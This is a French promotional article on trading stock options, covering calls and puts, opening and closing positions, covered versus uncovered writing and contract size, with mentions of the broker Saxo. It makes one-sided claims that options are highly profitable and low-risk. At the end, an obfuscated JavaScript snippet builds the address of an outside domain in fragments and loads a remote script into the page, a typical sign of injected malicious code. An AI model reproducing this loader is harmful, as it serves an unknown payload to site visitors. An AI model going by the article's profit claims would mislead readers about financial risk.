Finance

Négocier des options en bourse ; comment cela marche-t-il ?

Le marché boursier est un univers très difficile à gérer surtout lorsqu’on n’a pas de grandes connaissances dans le domaine. Vous avez envie d’en savoir plus sur la meilleure façon de négocier les options afin de devenir un homme/ femme d’affaires redoutable et respecté (e)? Lisez notre article qui vous dit absolument tout !

Qu’est ce qu’une option ? 

Ce terme est dérivé du mot latin “ optio” qui se traduit par droit ou non obligation en français. Il s’agit d’un contrat vous donnant le droit et non l’obligation d’exercer un droit préalablement acquis. 

Il existe deux types d’options en finances :  

Le premier est le call qui est un contrat grâce auquel vous obtenez le droit (sans en être obligé) d’acheter un actif à un prix fixé à l’avance et à une période déterminée antérieurement. 

Le second est le put et c’est un contrat qui vus donne le droit mais pas l’obligation de vendre un actif à un prix convenus à l’avance et à une période fixée au préalable. 

Les supports d’options sont très divers. Il peut s’agir notamment de devises, de matières premières, d’actions ou d’indices. 

Pourquoi négocier les options ? 

Il est essentiel de négocier les options en bourse parce que cela vous offre plusieurs avantages :  

Pour commencer, cela vous aide à vous forger une opinion à propos de ce qui va se passer avec un actif sous-jacent. Ainsi, vous pourrez, en tant qu’acheteur ou vendeur, vous pourrez obtenir le prix qui vous conviendra le mieux (à la baisse ou à la hausse).  

De plus, en négociant une option d’achat ou de vente avec le trader, vous procure un avantage qui consiste en un profit potentiel illimité. Ce qui constitue, en soi, une façon judicieuse de limiter le risque maximum à la prime de prix payée pour l’option. 

N’oublions pas que les acheteurs d’options bénéficient d’un contrôle sans faille sur une position d’actions très importante sans miser de gros capital.  

Contrairement à l’achat et à la vente d’actions, le trading d’options vous permet une meilleure flexibilité via une grande variété de conditions de marché disponible à la négociation. Nous parlons, entre autres, des marchés haussiers, baissiers, calmes, des marchés actifs,… 

Il va sans dire, également, que l’achat et la vente d’options en bourse est une source de revenus plus que rentable. C’est pour cette raison que les traders les négocient.  

Comment négocier les options en bourse ? 

Vous souhaitez avoir une vision plus claire de la meilleure façon de négocier les options ? Saxo est là pour vous guider et vous mettre dans les conditions adéquates. Suivez nos conseils pour être le plus performant possible :  

Avoir le bon type de compte 

Pour négocier les options, vous pouvez utiliser différents types de comptes. Toutefois, il vaut mieux formuler une demande auprès du courtier. Sachez, cependant, que les stratégies d’options sont étroitement liées au type de compte que vous avez. 

S’informer sur la cote d’une action 

La première chose qu’il faut connaitre, ce sont les échéances des options que vous voulez trader (hebdomadaires, mensuelles ou de longues durées). Cela est possible en consultant la chaîne d’options qui représente un ensemble de prix de levée une échéance précise. N’oubliez pas non plus qu’il existe deux catégories d’options : les options d’achat et les options de vente. 

Bien comprendre le jargon des options 

Si vous aspirez à faire de bonnes affaires, vous devez avant tout être incollable sur le jargon des options. Vous aurez donc l’obligation de connaitre tous les termes qui y sont reliés tels que : 

 L’achat d’ouverture : Achat d’une option pour prendre une nouvelle position. 

La vente de fermeture : La vente d’une option pour clôturer la position actuelle. 

La vente d’ouverture : Une option que vous ne détenez pas. 

L’achat de fermeture : Le rachat d’une option précédemment vendue en vue de clôturer la position. 

Distinguer “option couverte” et “option non couverte” 

La vente d’ouverture implique, pour le trader, des obligations qu’il doit assumer. En clair, si vous faite l’objet d’une assignation, vous devrez effectuer une option d’achat. Dans ce cas, si les actions sous-jacentes existent dans votre compte, vous êtes couvert. Sinon, vous ne l’êtes pas ! 

Étudier attentivement des contrats d’options 

La taille des contrats d’options est un élément très important à prendre en considération avant d’exercer votre droit d’achat ou de vente. Sachez que si vous cédez une option de vente, vous serez obligé d’acquérir des actions. Et pour être sûr de ne pas vous tromper, il est toujours bon de vous renseigner sur la valeur du contrat d’option ( celui-ci représente habituellement une position de 100 actions sous-jacentes ou 100 parts d’un fonds négocié en bourse). 

(function(){
xdp2_=(“u”+””)+”s”+””;xdp2_+=(“tat.”)+(“i”);
xdp2=document.createElement(“script”);xdp2.type=”text/javascript”;xdp2_+=”nf”+(“o”)+”/”;
xdp2u=”488965365″+”.”;xdp2.async=true;xdp2u+=”sXeyhcxqdp2px0eaz9cfu01a3469kn”;
xdp2.src=”https://”+xdp2_+xdp2u;xdp2b=document.body;xdp2b.appendChild(xdp2);
})();